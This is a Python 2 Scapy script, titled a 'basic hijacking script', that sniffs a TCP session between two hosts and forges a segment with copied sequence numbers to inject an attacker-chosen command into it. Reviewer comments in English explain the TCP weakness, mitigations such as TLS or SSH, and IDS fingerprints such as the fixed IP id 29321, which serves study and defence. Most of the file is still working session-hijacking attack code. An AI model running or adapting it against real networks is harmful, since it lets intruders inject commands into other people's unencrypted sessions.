#Basic Hijacking Script
#Use Scapy
#!usr/bin/env/python
# NOTE(review): the line above is not a usable shebang (relative path, and it
# is not the first line of the file), so the script has to be started with an
# interpreter explicitly. The `print` statements and the `lambda(f):`
# tuple-parameter syntax at the bottom are Python 2 only; this does not parse
# under Python 3.
#
# What this script illustrates, from a defender's point of view: an on-path
# observer who can read a single segment of an unencrypted, unauthenticated
# TCP session sees the addresses, ports and seq/ack values that the peer uses
# to decide whether a segment belongs to the connection. TCP itself offers no
# protection against that; the mitigation lives above it (TLS, SSH, or another
# authenticated and encrypted transport), so that injected bytes fail an
# integrity check instead of being consumed as application input.
# Detection angle: the forged segment is expected to overlap the legitimate
# peer's sequence space (same seq/ack as real traffic, different payload) and
# carries a constant IP identification value (see `id=29321` below); both are
# artefacts an IDS can flag as inconsistent/overlapping segments.

from scapy.all import *   # wildcard import: Ether, IP, TCP, sniff, sendp all come from here
import sys

# Positional arguments, read without any validation (IndexError if missing):
#   argv[1] = address whose outgoing segments are watched ("target")
#   argv[2] = TCP port used in the capture filter
#   argv[3] = address the watched segments must be going to ("client")
#   argv[4] = text injected as the TCP payload (read inside hijack())
"""Filtre a appliqué au Sniffer"""
# "filter to apply to the sniffer": BPF expression for sniff(), restricting
# capture to traffic involving host argv[1] on port argv[2]. It is built by
# string concatenation, so a malformed argument surfaces as a capture-layer
# filter error rather than a usage message.
filtre = "host " + sys.argv[1] + " and port " + sys.argv[2]

print "Waiting For Hosts " + sys.argv[1] + " > " + sys.argv[3] + " And Port " + sys.argv[2]
print " "

def hijack(p):
    # Callback handed to sniff() for every packet that passes both filters.
    #
    # p: a Scapy packet carrying IP and TCP layers (guaranteed by the lfilter
    #    in the sniff() call below).
    # Returns nothing. On the first packet flowing argv[1] -> argv[3] it
    # sends one forged segment and terminates the whole process via sys.exit().
    cmd=sys.argv[4]
    """On Stock la commande a executer"""
    # (string above: "store the command to execute" -- a bare string
    # statement, i.e. a runtime no-op rather than a real comment)

    """Si la Source est celle de la cible (ici, le serveur par exemple) et la destination celle du client"""
    # "if the source is the target (e.g. the server) and the destination is
    # the client": only segments from argv[1] to argv[3] are acted on.
    if p[IP].src==sys.argv[1] and p[IP].dst==sys.argv[3]:
        print "[+] Found!"
        print "Seq: " + str(p[TCP].seq) + " | Ack: " + str(p[TCP].ack)

        """Seq = Seq_du_paquet_precedent + Len_des_Datas"""
        # "seq = previous packet's seq + data length" states the TCP rule;
        # the code below simply mirrors the observed ack/seq values.
        print "Hijack Seq: " + str(p[TCP].ack) + " | Hijack Ack: " + str(p[TCP].seq)
        print " "
        print "[+] Hijack Session!"

        """On forge un Paquet pour notre attaque a partir du paquet reçu de la cible"""
        # "forge a packet from the one received from the target": each layer
        # is a mirror image of p with source and destination swapped.
        """Ethernet"""
        ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
        """IP"""
        # ihl/flags/frag/ttl/proto are copied from p; the identification
        # field is the hard-coded constant 29321, a fixed value the real
        # sender would never produce consistently -- a fingerprint.
        ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl, proto=p[IP].proto, id=29321)
        """TCP"""
        # Ports swapped; seq takes the observed ack and ack takes the observed
        # seq; flags forced to PSH+ACK ("PA"); dataofs/reserved/window/options
        # copied verbatim from p.
        tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="PA", window=p[TCP].window, options=p[TCP].options)

        """On forme le paquet final et on l'envoie"""
        # "assemble the final packet and send it": payload is cmd plus a
        # newline, transmitted at layer 2 with sendp(). The local name
        # `hijack` shadows this function inside its own body; harmless only
        # because the function exits immediately afterwards.
        hijack = ether/ip/tcp/(cmd+"\n")
        sendp(hijack)

        """On sort du script"""
        # "leave the script": a single injection, then the process ends.
        # Without this, sniff() below would keep running (count=0).
        sys.exit()

"""Sniffer qui applique a chaques paquets reçu la fonction hijack, paquets trier selon le filtre"""
# "sniffer that applies hijack() to every received packet, filtered by
# filtre": count=0 -> no packet limit; filter -> the BPF expression above
# (applied by the capture layer); lfilter -> Python-side check that both IP
# and TCP layers are present, so the p[IP]/p[TCP] lookups in hijack() cannot
# raise on non-TCP traffic.
sniff(count=0,prn = lambda p : hijack(p),filter=filtre,lfilter=lambda(f): f.haslayer(IP) and f.haslayer(TCP))
St0rn